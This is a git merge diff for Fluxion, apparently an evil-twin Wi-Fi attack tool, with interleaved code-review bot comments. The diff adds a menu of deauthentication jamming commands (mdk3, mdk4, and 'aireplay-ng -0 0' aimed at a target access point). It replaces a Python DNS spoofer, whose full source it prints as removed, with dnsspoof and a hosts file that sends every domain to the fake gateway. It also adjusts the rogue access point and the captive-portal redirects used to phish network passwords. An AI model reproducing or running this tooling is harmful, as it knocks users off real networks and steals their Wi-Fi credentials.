Merge pull request #813 from FluxionNetwork/usama7628674-fixes
Usama7628674 fixes
commit
3535f5ed6a
|
@ -16,7 +16,7 @@ CaptivePortalAuthenticationMethodsInfo=(
|
|||
# ============= < Virtual Network Configuration > ============ #
|
||||
# To avoid collapsing with an already existing network,
|
||||
# we'll use a somewhat uncommon network and server IP.
|
||||
CaptivePortalGatewayAddress="192.168.254.1"
|
||||
CaptivePortalGatewayAddress="192.169.254.1"
|
||||
CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*}
|
||||
|
||||
|
||||
|
@ -116,7 +116,7 @@ captive_portal_set_ap_interface() {
|
|||
# interface is in used by something else (virtual reservation?).
|
||||
echo "Virtual interface required, attempting." > $FLUXIONOutputDevice
|
||||
if ! iw dev $CaptivePortalJammerInterface interface \
|
||||
add ${CaptivePortalJammerInterface}v type monitor \
|
||||
add ${CaptivePortalJammerInterface}v type managed \
|
||||
2> $FLUXIONOutputDevice; then
|
||||
echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
|
||||
sleep 5
|
||||
|
@ -154,6 +154,13 @@ function captive_portal_set_ap_service() {
|
|||
|
||||
captive_portal_unset_ap_service
|
||||
|
||||
echo -e "$FLUXIONVLine ${CClr}Select a method of deauthentication\n${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}1${CSRed}]${CClr} mdk4${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}3${CSRed}]${CClr} mdk3\n${CClr}"
|
||||
read -p $'\e[0;31m[\e[1;34mfluxion\e[1;33m@\e[1;37m'"$HOSTNAME"$'\e[0;31m]\e[0;31m-\e[0;31m[\e[1;33m~\e[0;31m] \e[0m' option_deauth
|
||||
|
||||
|
||||
if [ "$FLUXIONAuto" ]; then
|
||||
CaptivePortalAPService="hostapd"
|
||||
else
|
||||
|
@ -725,7 +732,7 @@ index-file.names = (
|
|||
|
||||
# Respond with Google's captive response on certain domains.
|
||||
# Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com
|
||||
\$HTTP[\"host\"] =~ \"((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com\" {
|
||||
\$HTTP[\"host\"] =~ \"asdf\" {
|
||||
server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
|
||||
url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
|
||||
}
|
||||
|
@ -734,7 +741,7 @@ index-file.names = (
|
|||
echo "\
|
||||
# Redirect all traffic to the captive portal when not emulating a connection.
|
||||
\$HTTP[\"host\"] != \"captive.gateway.lan\" {
|
||||
url.redirect-code = 302
|
||||
url.redirect-code = 307
|
||||
url.redirect = (
|
||||
\"^/(.*)\" => \"http://captive.gateway.lan/\",
|
||||
)
|
||||
|
@ -742,92 +749,15 @@ index-file.names = (
|
|||
" >>"$FLUXIONWorkspacePath/lighttpd.conf"
|
||||
fi
|
||||
|
||||
# Create a DNS service with python, forwarding all traffic to gateway.
|
||||
# Create a temporary hosts file to be used with dnsspoof
|
||||
echo "\
|
||||
import sys, traceback, socket
|
||||
# NOTICE: This DNS server works with python 2 and python 3
|
||||
${CaptivePortalGatewayAddress} *.*
|
||||
172.217.5.238 google.com
|
||||
172.217.13.78 clients3.google.com
|
||||
172.217.13.78 clients4.google.com
|
||||
" >"$FLUXIONWorkspacePath/hosts"
|
||||
|
||||
class DNSQuery:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
self.domain = ''
|
||||
|
||||
queryType = (ord(data[2]) >> 3) & 15
|
||||
|
||||
# Only handle basic requests.
|
||||
if queryType != 0:
|
||||
print('Ignoring Query: Non-spoofed type.')
|
||||
return
|
||||
|
||||
domainStart = 13 # Skip length byte and start at domain.
|
||||
domainLength = ord(data[domainStart - 1]) # Evaluate length byte.
|
||||
|
||||
while domainLength != 0:
|
||||
self.domain += data[domainStart : domainStart + domainLength] + '.'
|
||||
|
||||
domainStart += domainLength + 1 # Skip the length byte & start at domain.
|
||||
domainLength = ord(data[domainStart - 1]) # Evaluate length byte.
|
||||
|
||||
def response(self, ipv4):
|
||||
if not self.domain: return ''
|
||||
|
||||
packet = ''
|
||||
|
||||
packet += self.data[ :2] + '\x81\x80'
|
||||
packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
|
||||
packet += self.data[12:]
|
||||
packet += '\xc0\x0c'
|
||||
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
|
||||
|
||||
# Convert string IPv4 quads to binary values (bytes).
|
||||
packet += str.join('', map(lambda s: chr(int(s)), ipv4.split('.')))
|
||||
|
||||
return packet
|
||||
|
||||
if __name__ == '__main__':
|
||||
targetIPv4 = '$CaptivePortalGatewayAddress'
|
||||
|
||||
print('Mini DNS Spoofer:: dom.query. 60 IN A %s' % targetIPv4)
|
||||
|
||||
link = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
link.bind(('',53))
|
||||
|
||||
try:
|
||||
while True:
|
||||
clientData, clientIPv4 = link.recvfrom(1024)
|
||||
|
||||
queryData = clientData if sys.version_info < (3, 0) else clientData.decode('unicode_escape')
|
||||
|
||||
query = DNSQuery(queryData)
|
||||
|
||||
response = query.response(targetIPv4)
|
||||
|
||||
if sys.version_info > (3, 0):
|
||||
# Someone that knows more about python and how it does byte-handling,
|
||||
# please fix the following shitfest and make it a bit more elegant.
|
||||
# Do what? A raw conversion of the \"response\" string to bytes.
|
||||
responseHex = ''
|
||||
for xx in response:
|
||||
responseHex += \"%x%x\" % ((ord(xx) >> 4) & 0b1111, ord(xx) & 0b1111)
|
||||
|
||||
response = bytearray.fromhex(responseHex)
|
||||
|
||||
link.sendto(response, clientIPv4)
|
||||
|
||||
print('Request: %s -> %s' % (query.domain, targetIPv4))
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print('INTERRUPT: Stopping.')
|
||||
link.close()
|
||||
|
||||
except Exception as error:
|
||||
print('EXCEPTION: Stopping!')
|
||||
print(error)
|
||||
print(traceback.format_exc())
|
||||
link.close()
|
||||
" >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
|
||||
chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
#chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
|
||||
local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"}
|
||||
# Attack arbiter script
|
||||
|
@ -1429,7 +1359,7 @@ stop_attack() {
|
|||
CaptivePortalWebServicePID="" # Clear service PID
|
||||
fi
|
||||
|
||||
# Kill python DNS service if one is found.
|
||||
# Kill DNS service if one is found.
|
||||
if [ "$CaptivePortalDNSServiceXtermPID" ]; then
|
||||
kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
|
||||
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
|
||||
|
@ -1496,7 +1426,7 @@ start_attack() {
|
|||
echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
|
||||
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
|
||||
-title "FLUXION AP DNS Service" -e \
|
||||
"if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" &
|
||||
"dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalDNSServiceXtermPID=$!
|
||||
|
||||
|
@ -1519,14 +1449,28 @@ start_attack() {
|
|||
"./$FLUXIONWorkspacePath/captive_portal/deauth-ng.py -i $CaptivePortalJammerInterface -f 5 -c $FluxionTargetChannel -a $FluxionTargetMAC" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
else
|
||||
elif [[ $option_deauth -eq 1 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
elif [[ $option_deauth -eq 2 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"aireplay-ng -0 0 -a $FluxionTargetMAC --ignore-negative-one $CaptivePortalJammerInterface" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
|
||||
elif [[ $option_deauth -eq 3 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
fi
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
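Review bot: The gateway address in the first hunk, which as rendered appears to become `CaptivePortalGatewayAddress="192.169.254.1"`, is no longer inside 192.168.0.0/16 and therefore not RFC 1918 private space, while the comment above it still describes choosing an uncommon network to avoid collisions. Addresses in 192.169.0.0/16 are publicly routable and may be assigned to a third party, so hosts on this network lose reachability to the real range and any route or traffic leak points at someone else's addresses. If the goal is only to stay off common subnets, keep a private range, e.g. `CaptivePortalGatewayAddress="192.168.254.1"` or another RFC 1918 /24. The same literal is repeated in the airbase-ng service hunk (`eval ifconfig at0 192.169.254.1`), so the two have to change together.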
|
||||
|
|
|
@ -11,7 +11,7 @@ CaptivePortalStaringAPRoutesNotice="Starte den routing Service "
|
|||
CaptivePortalStartingDHCPServiceNotice="Starte den DHCP Service"
|
||||
CaptivePortalStartingDNSServiceNotice="Starte den DNS Service."
|
||||
CaptivePortalStartingWebServiceNotice="Starte den AP"
|
||||
CaptivePortalStartingJammerServiceNotice="Starte mdk3 als Service"
|
||||
CaptivePortalStartingJammerServiceNotice="Starte mdk4/aireplay als Service"
|
||||
CaptivePortalStartingAuthenticatorServiceNotice="Authentifizierungsskript wird gestartet"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
CaptivePortalAPServiceQuery="Select an access point service"
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# description: Acquires WPA/WPA2 encryption hashes.
|
||||
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
HandshakeSnooperJammerInterfaceQuery="Selecteer eenn interface voor monitoring & jamming."
|
||||
HandshakeSnooperJammerInterfaceQuery="Selecteer een interface voor monitoring & jamming."
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
HandshakeSnooperMethodQuery="Selecteer een methode voor handshake verkrijgen"
|
||||
HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passief$CClr)"
|
||||
|
@ -23,8 +23,8 @@ HandshakeSnooperStartingArbiterNotice="${CCyn}Handshake Snooper$CClr arbiter dae
|
|||
HandshakeSnooperSnoopingForNSecondsNotice="Snooping voor \$HandshakeSnooperVerifierInterval seconden."
|
||||
HandshakeSnooperStoppingForVerifierNotice="Stop snooper & controle voor hashes."
|
||||
HandshakeSnooperSearchingForHashesNotice="Zoek naar hashes in het capture bestand."
|
||||
HandshakeSnooperArbiterAbortedWarning="${CYel}Geannuleerd${CClr}: De operatie is geannuleerd been, geen geldige hash gevonden."
|
||||
HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion's database."
|
||||
HandshakeSnooperArbiterAbortedWarning="${CYel}Afgebroken${CClr}: De operatie is afgebroken, geen geldige hash gevonden."
|
||||
HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion database."
|
||||
HandshakeSnooperArbiterCompletedTip="${CBCyn}Handshake Snooper$CBYel aanval afgerond, Sluit dit scherm en start een andere aanval.$CClr"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
|
||||
|
|
11
fluxion.sh
11
fluxion.sh
|
@ -4,6 +4,10 @@
|
|||
# ================== < FLUXION Parameters > ================== #
|
||||
# ============================================================ #
|
||||
# Path to directory containing the FLUXION executable script.
|
||||
|
||||
for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do
|
||||
killall $program &> /dev/null
|
||||
done
|
||||
readonly FLUXIONPath=$(dirname $(readlink -f "$0"))
|
||||
|
||||
# Path to directory containing the FLUXION library (scripts).
|
||||
|
@ -21,8 +25,8 @@ readonly FLUXIONPreferencesFile="$FLUXIONPath/preferences/preferences.conf"
|
|||
readonly FLUXIONNoiseFloor=-90
|
||||
readonly FLUXIONNoiseCeiling=-60
|
||||
|
||||
readonly FLUXIONVersion=5
|
||||
readonly FLUXIONRevision=9
|
||||
readonly FLUXIONVersion=6
|
||||
readonly FLUXIONRevision=0
|
||||
|
||||
# Declare window ration bigger = smaller windows
|
||||
FLUXIONWindowRatio=4
|
||||
|
@ -280,7 +284,7 @@ fluxion_startup() {
|
|||
local requiredCLITools=(
|
||||
"aircrack-ng" "bc" "awk:awk|gawk|mawk"
|
||||
"curl" "cowpatty" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd"
|
||||
"iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl"
|
||||
"iwconfig:wireless-tools" "macchanger" "mdk4" "dsniff" "mdk3" "nmap" "openssl"
|
||||
"php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools"
|
||||
"fuser:psmisc" "killall:psmisc"
|
||||
)
|
||||
|
@ -352,6 +356,7 @@ fluxion_shutdown() {
|
|||
# Only deallocate fluxion or airmon-ng created interfaces.
|
||||
if [[ "$interface" == "flux"* || "$interface" == *"mon"* || "$interface" == "prism"* ]]; then
|
||||
fluxion_deallocate_interface $interface
|
||||
systemctl restart network-manager
|
||||
fi
|
||||
done
|
||||
fi
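Review bot: The new `for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do killall $program` loop runs at file scope on every invocation, and it is inserted between the comment "Path to directory containing the FLUXION executable script." and the `readonly FLUXIONPath=` line that comment documents. With output sent to `/dev/null`, the user gets no indication of which processes were killed or whether `airmon-ng` was even available. I would move it into the startup path after the privilege and dependency checks (not visible in this hunk) and give it its own comment, e.g. `# Stop processes airmon-ng reports as interfering with the wireless interfaces.`. The quoted `"$(...)"` makes the loop body run once with the whole list as a single word, so `for program in $(...)` is presumably what was meant. In the shutdown hunk, `systemctl restart network-manager` runs once per matching interface and assumes that unit name exists on the host; restarting once after the loop, behind a check that the unit is present, would be safer.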
|
||||
|
|
|
@ -72,7 +72,7 @@ function ap_service_start() {
|
|||
|
||||
xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \
|
||||
-title "FLUXION AP Service [airbase-ng]" -e \
|
||||
airbase-ng -P -e $APServiceSSID -c $APServiceChannel \
|
||||
airbase-ng -y -e $APServiceSSID -c $APServiceChannel \
|
||||
-a $APServiceMAC $APServiceInterface &
|
||||
local parentPID=$!
|
||||
|
||||
|
@ -81,7 +81,7 @@ function ap_service_start() {
|
|||
sleep 1
|
||||
APServicePID=$(pgrep -P $parentPID)
|
||||
done
|
||||
|
||||
eval ifconfig at0 192.169.254.1
|
||||
ap_service_route
|
||||
}
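Review bot: `eval ifconfig at0 192.169.254.1` in `ap_service_start` does not need `eval`, and it hard-codes both the interface name and the gateway address inside a generic AP service routine. `eval` re-parses its arguments, so it becomes a command-injection risk as soon as any part of that line is made variable. Prefer a plain call that takes the address from the caller's configuration, e.g. `ifconfig at0 "$CaptivePortalGatewayAddress"`, assuming that variable is in scope here (not visible in this hunk), and check its exit status before calling `ap_service_route`. The beginning of the function is outside the hunk.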
|
||||
|
||||
|
|